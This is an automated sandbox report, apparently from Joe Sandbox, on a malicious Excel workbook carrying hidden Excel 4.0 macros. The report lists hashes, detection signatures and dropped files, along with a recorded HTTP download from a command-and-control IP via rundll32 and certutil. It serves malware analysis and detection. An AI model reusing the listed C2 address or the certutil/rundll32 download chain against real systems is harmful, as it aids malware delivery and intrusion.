Analysis Report Presentation_812525.xlsb

Overview

General Information

Sample Name: Presentation_812525.xlsb
Analysis ID: 342076
MD5: 4ddace9347c434a749eab40a211e6628
SHA1: c46b2b46bd274ad37bb5dbcea12bc8278f3b361e
SHA256: 796d5317aae9d27707694f5e2832fe990d1a7890ac53ec339b8f1233fe05a3a7

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Certutil Command
Uses certutil -decode
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\94101.png ReversingLabs: Detection: 35%

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.3:49709 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\certutil.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: yahoo.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49708 -> 74.6.143.26:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 172.104.129.156:80

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.248.100.215 87.248.100.215
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /campo/o/o HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.104.129.156Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 172.104.129.156
Source: unknown TCP traffic detected without corresponding DNS query: 172.104.129.156
Source: unknown TCP traffic detected without corresponding DNS query: 172.104.129.156
Source: unknown TCP traffic detected without corresponding DNS query: 172.104.129.156
Source: unknown TCP traffic detected without corresponding DNS query: 172.104.129.156
Source: unknown TCP traffic detected without corresponding DNS query: 172.104.129.156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001000 EntryPoint,GetProcAddress,GetProcAddress,CreateDirectoryA,URLDownloadToFileA, 6_2_10001000
Source: global traffic HTTP traffic detected: GET /campo/o/o HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.104.129.156Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: <img src="https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c7=https%3A%2F%2Fwww.yahoo.com%2F&c5=2023538075&cv=2.0&cj=1&c14=-1" /> equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: C = {"useYAC":0,"usePE":0,"servicePath":"https:\/\/www.yahoo.com\/sdarla\/php\/fc.php","xservicePath":"","beaconPath":"https:\/\/www.yahoo.com\/sdarla\/php\/b.php","renderPath":"","allowFiF":false,"srenderPath":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-sf.html","renderFile":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-sf.html","sfbrenderPath":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-sf.html","msgPath":"https:\/\/fc.yahoo.com\/unsupported-1946.html","cscPath":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-csc.html","root":"sdarla","edgeRoot":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0","sedgeRoot":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0","version":"4-6-0","tpbURI":"","hostFile":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/js\/g-r-min.js","beaconsDisabled":true,"rotationTimingDisabled":true,"fdb_locale":"What don't you like about this ad?|It's offensive|Something else|Thank you for helping us improve your Yahoo experience|It's not relevant|It's distracting|I don't like this ad|Send|Done|Why do I see ads?|Learn more about your feedback.|Want an ad-free inbox? Upgrade to Yahoo Mail Pro!|Upgrade Now","positions":{"DEFAULT":{"supports":false},"HPSPON":{"w":1,"h":1},"FPAD":{"w":1,"h":1},"LREC":{"w":300,"h":250},"MAST":{"w":1,"h":1},"MON":{"w":1,"h":1},"LREC4":{"w":300,"h":250},"LREC3":{"w":300,"h":250}},"lang":"en-US"}; equals www.yahoo.com (Yahoo)
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: C.positions = {"LREC":{"pos":"LREC","clean":"my-adsLREC","dest":"my-adsLREC-iframe","metaSize":true,"w":300,"h":250,"fdb":true,"supports":{"exp-ovr":0,"lyr":0},"doubleBuffering":false},"MAST":{"pos":"MAST","clean":"my-adsMAST","dest":"my-adsMAST-iframe","fr":"expIfr_exp","rmxp":0,"metaSize":true,"w":970,"h":250,"supports":{"exp-ovr":1,"exp-push":1,"resize-to":1,"lyr":1},"closeBtn":{"adc":0,"mode":2,"useShow":1},"fclose":2,"fdb":{"1":"1","where":"inside","on":1},"doubleBuffering":false},"MON":{"pos":"MON","clean":"my-adsMON","dest":"my-adsMON-iframe","metaSize":true,"w":300,"h":600,"fdb":true,"supports":{"exp-ovr":1,"resize-to":1,"lyr":0}},"LREC4":{"pos":"LREC4","id":"LREC4","clean":"my-adsLREC4","dest":"my-adsLREC4-iframe","doubleBuffering":false,"metaSize":true,"w":300,"h":250,"fdb":true,"supports":{"exp-ovr":0}},"LREC3":{"pos":"LREC3","id":"LREC3","clean":"my-adsLREC3","dest":"my-adsLREC3-iframe","metaSize":true,"w":300,"h":250,"fdb":true,"supports":{"exp-ovr":0}},"DEFAULT":{"sandbox":0,"meta":{"hostURL":"https:\/\/www.yahoo.com"}}}; equals www.yahoo.com (Yahoo)
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: _comscore.push({"c1":"2","c2":"7241469","c5":"2023538075","c7":"https:\/\/www.yahoo.com\/","c14":-1}); equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: <link rel="canonical" href="https://www.yahoo.com/" /> <meta property="fb:pages" content="7040724713, 37510781596, 128015890542670, 73756409831, 1273983622628492, 183227235893, 107952415910993, 828031943896361, 338028696036, 228108177528276, 126435880711, 8603738371, 357311694375173, 168824166370, 116789651713844, 116789651713844, 284428852938, 116789651713844, 169590426398017, 150897358265131, 115060728528067, 358130347547704, 167601473274275, 166721106679241, 1573791532894850, 141301389258994, 138207559575213, 112996545439734, 345185573000, 131747896861126, 345185573000, 81262596234, 107143776010250, 137657892926963, 118757131504803" /> <meta name="referrer" content="unsafe-url"> <link href="https://s.yimg.com/os/yc/css/bundle.c60a6d54.css" rel="stylesheet" type="text/css"> equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: <meta property="og:url" content="http://www.yahoo.com" /> equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: <div><div id="footer-wrapper" role="contentinfo"><ul class="Lh(22px) Fz(13px) Ta(c)"><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/terms/otos/index.html">Terms (Updated)</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/index.html">Privacy (Updated)</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/advertising">Advertise</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html">About Our Ads</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/careers">Careers</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://help.yahoo.com/kb/account">Help</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://yahoo.uservoice.com/forums/341361-yahoo-home?browser=ie&amp;bucket=FPTRELUG105&amp;os=windows%20nt&amp;partner=none&amp;location=US&amp;rid=90oo801g0gagb">Feedback</a></li></ul></div></div> <!-- App close --> equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: s Breakthrough" aria-hidden="true" tabindex="-1"><div class="Fl(start) Maw(220px) W(26%) Mend(25px)"><div class="H(0) T(0px) Bdrs(2px) Start(0)" style="padding-bottom:52.11%"><img class="W(100%) Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/UFLqS.xvyj1podCMDQzrLA--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/av/ads/1610831964757-4295.jpg.cf.jpg" alt=""/></div></div></a><div class="Ov(h) Pend(45px)"><div class="Pos(r) Z(2)"><a class="D(i) Ell Fz(13px) Mb(2px) Fw(b) C($streamItemGray) Td(n) Mend(6px)" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html" data-ylk="elm:itm;elmt:sp;itc:0;bpos:1;cpos:23;cposy:46;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36172530333;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1;itc:0" rel="nofollow noopener noreferrer" target="_blank">Ad</a><a class="D(i) Fz(12px) C($streamItemGray) Ell Mb(2px) Td(n)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=fQKaxu0GIS8L4ViC9YFGxIq6qeSf43.RmLTLfskM62lwTjP2h32LScnFLYzFp.DOwkXmPDtJ2ncDwX2gM3YotBJT_8WqYtq9N7Ss2iBl0BK2.5HBXOWYuhsKvWivKCpDJUJ3d8LGz_FK4XJTJxeEJfkBo1QeCkgm7RK.r70NeZ7QiQyrso3r3.KfAkDxkYR3p0kOjdGJphXX2Hr.g94q1GoJaLdsGaEh3E529_x73CS5WbWtOj83_nx2HcC3hHNr3uxXv_uGiemUUwjL8YewW3DVPd71mfocI281qx8LctOZlbyDP4.JMJL_OS7WWlw9x6McMaumrH0gb9wbJqZLmsEyeZ.6yq9pfI0tjLxcna24dBJQauhqNOIOEzSZIO17de9.1bv_gDmZXzrP1miP3qSj5hKSbVmCYyuYuG3AAGHP9dl_EVAde7afXi2OM0hio0YBkddeEgvIp1jvbbYiKZOGSRVz.5Y0z4cEwvQ6WwhJAj70Ej9WzuHfUuuruq5JTGwHwC9Cc2soYgPXOn5HTNmTpeqk2B9P5.AWIpNOi.NftSEMw.PxJceX9H17gsQig75qPUWC" rel="nofollow noopener noreferrer" target="_blank" data-ylk="elm:itm;elmt:ad;itc:0;bpos:1;cpos:23;cposy:46;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36172530333;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1;itc:0">Physics Market News</a></div><div class="Pos(r) ad-content"><a class="D(b) Td(n) C($c-fuji-blue-4-b) ad-content:h_C($streamHoverClass)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=fQKaxu0GIS8L4ViC9YFGxIq6qeSf43.RmLTLfskM62lwTjP2h32LScnFLYzFp.DOwkXmPDtJ2ncDwX2gM3YotBJT_8WqYtq9N7Ss2iBl0BK2.5HBXOWYuhsKvWivKCpDJUJ3d8LGz_FK4XJTJxeEJfkBo1QeCkgm7RK.r70NeZ7QiQyrso3r3.KfAkDxkYR3p0kOjdGJphXX2Hr.g94q1GoJaLdsGaEh3E529_x73CS5WbWtOj83_nx2HcC3hHNr3uxXv_uGiemUUwjL8YewW3DVPd71mfocI281qx8LctOZlbyDP4.JMJL_OS7WWlw9x6McMaumrH0gb9wbJqZLmsEyeZ.6yq9pfI0tjLxcna24dBJQauhqNOIOEzSZIO17de9.1bv_gDmZXzrP1miP3qSj5hKSbVmCYyuYuG3AAGHP9dl_EVAde7afXi2OM0hio0YBkddeEgvIp1jvbbYiKZOGSRVz.5Y0z4cEwvQ6WwhJAj70Ej9WzuHfUuuruq5JTGwHwC9Cc2soYgPXOn5HTNmTpeqk2B9P5.AWIpNOi.NftSEMw.PxJceX9H17gsQig75qPUWC" rel="nofollow noopener noreferrer" target="_blank" data-ylk="elm:hdln;elmt:ad;itc:0;bpos:1;cpos:23;cposy:46;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36172530333;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1
Source: rundll32.exe, 00000006.00000002.250006343.000000000452A000.00000004.00000010.sdmp String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: rundll32.exe, 00000006.00000002.250797242.0000000004B00000.00000004.00000001.sdmp String found in binary or memory: yBiKz1QiFeZaAGxCelF1Hc5BCEh7kSE8LBpzpMcl9SEh_3NsKzCXu9GOgNnTGKHhDRvpeU3IzgMdr5LuxYi6dBmXwzkz2IHY53n.taE36_gLJKsifXETy8dDi9K9.YDQHxM2onOlESAa_DI.BUuDPbGkABxfDwvPHzChyIV5iZCxOeGKc_B5ngw3vbsf5AZWxmND0Krhp6K2S3UjxLuGzIrsbWWcKfvB..6LDNsjGUHh5x3FxKkJy8ae3kEA1NMZznRQLQXAOe5C9YIqCtJ6eKxpg4tWyeq.FpA5DmffnYqBefkvcD8qFFHdr5qqBQ5rgEVhvI1TSI5z0Uon0GvJcN4KoxJXkLxtW3Yrp7a3Ru4-&amp;ap=17" data-wf-image-beacons=""><div class="Py(12px) Pos(r) Cf show-then-hide-ad-confirmation_D(n) hide-ad_D(n)"><a class="D(b) Td(n)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=.e0macUGIS.Fz63sr2P207YOEOlgDwoy2SQq4Qs8SQ3DYflEuodImfcAUDa5sPXHtSLDC52eE7P3.FDorzgLz6ex3KnfPileCmoFuF_6StqbvON.w8omSvOAHONh2WFvW0D8JAIjw3j0gRcNM.TG6ik6.wz8z_wIfdaQXqAlgog68biboszlOHf8xTNgR1uIYNshTXcaoUA0NM_t89FQ8FF6ppirRbkIIaxqCDAgEbKTzNbtP8Vk81_b3wqEd2hkveZKOwTeLsl_.yERN8gTo31BtrMABjWPXN7gpumNPuTxNzmteHQLgjjOvwHKmCw1mDvIpNyYar4K5aRUWmrbjG4ZZ95GuMp5Yc7RhjM3fvcDf67ddnT_5Cy2KYKhViTcoR7GHQ.CuPuoiOnwSdxE83_84evjBqB7aTQiCuGXiMgR1elXIrv27E9LDJX_pclNeIrQgv8cgmee576220cW9zdNqjYr9qbRsxDy9u8huu7w0HacXp_Y8ajQly8PL8akuxQOd0NKDQF3FEHwL8aT7ISiZEurtqTUePgw3XhJ67f_" rel="nofollow noopener noreferrer" target="_blank" data-ylk="elm:img;elmt:ad;itc:0;bpos:1;cpos:18;cposy:37;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36174217417;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1;itc:0;slk:China&#x27;s Giant Is Setting Up New Venture" aria-hidden="true" tabindex="-1"><div class="Fl(start) Maw(220px) W(26%) Mend(25px)"><div class="H(0) T(0px) Bdrs(2px) Start(0)" style="padding-bottom:52.11%"><img class="W(100%) Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/ukebcHBGNd6YYmQqOpTWGQ--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/av/ads/1610884787084-2051.jpg.cf.jpg" alt=""/></div></div></a><div class="Ov(h) Pend(45px)"><div class="Pos(r) Z(2)"><a class="D(i) Ell Fz(13px) Mb(2px) Fw(b) C($streamItemGray) Td(n) Mend(6px)" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html" data-ylk="elm:itm;elmt:sp;itc:0;bpos:1;cpos:18;cposy:37;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36174217417;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1;itc:0" rel="nofollow noopener noreferrer" target="_blank">Ad</a><a class="D(i) Fz(12px) C($streamItemGray) Ell Mb(2px) Td(n)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=.e0macUGIS.Fz63sr2P207YOEOlgDwoy2SQq4Qs8SQ3DYflEuodImfcAUDa5sPXHtSLDC52eE7P3.FDorzgLz6ex3KnfPileCmoFuF_6StqbvON.w8omSvOAHONh2WFvW0D8JAIjw3j0gRcNM.TG6ik6.wz8z_wIfdaQXqAlgog68biboszlOHf8xTNgR1uIYNshTXcaoUA0NM_t89FQ8FF6ppirRbkIIaxqCDAgEbKTzNbtP8Vk81_b3wqEd2hkveZKOwTeLsl_.yERN8gTo31BtrMABjWPXN7gpumNPuTxNzmteHQLgjjOvwHKmCw1mDvIpNyYar4K5aRUWmrbjG4ZZ95GuMp5Yc7RhjM3fvcDf67ddnT_5Cy2KYKhViTcoR7GHQ.CuPuoiOnwSdxE83_84evjBqB7aTQiCuGXiMgR1elXIrv27E9LDJX_pclNeIrQgv8cgmee576220cW9zdNqjYr9qbRsxDy9u8huu7w0HacXp_Y
Source: unknown DNS traffic detected: queries for: yahoo.com
Source: 94101.png.4.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 94101.png.4.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: http://modernizr.com/download/#-touch-cssclasses-teststyles-prefixes
Source: 94101.png.4.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: http://www.yahoo.com
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://aka-cdn.adtechus.com/images/ATCollapse.gif
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.cortana.ai
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.office.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.onedrive.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://augloop.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://baseball.fantasysports.yahoo.com/b1/signup
Source: rundll32.exe, 00000006.00000002.250797242.0000000004B00000.00000004.00000001.sdmp String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=.e0macUGIS.Fz63sr2P207YOEOlgDwoy2SQq4Qs8SQ3DYflE
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=fQKaxu0GIS8L4ViC9YFGxIq6qeSf43.RmLTLfskM62lwTjP2
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://bf.us.y.atwola.com/?adlink
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://bf.us.y.atwola.com/adcount%7C2.0%7C5113.1%7C4830399%7C0%7C170%7CAdId=10679286;BnId=2;ct=2475
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://bf.us.y.atwola.com/adcount%7C2.0%7C5113.1%7C4830424%7C0%7C0%7CAdId=-3;BnId=0;ct=2475606453;s
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://bf.us.y.atwola.com/adcount%7C2.0%7C5113.1%7C4830462%7C0%7C170%7CAdId=10679288;BnId=2;ct=2475
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://bf.us.y.atwola.com/adcount%7C2.0%7C5113.1%7C4867771%7C0%7C0%7CAdId=-41;BnId=0;ct=2475606453;
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://cdn.entity.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://cortana.ai
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://cortana.ai/api
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://cr.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://directory.services.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
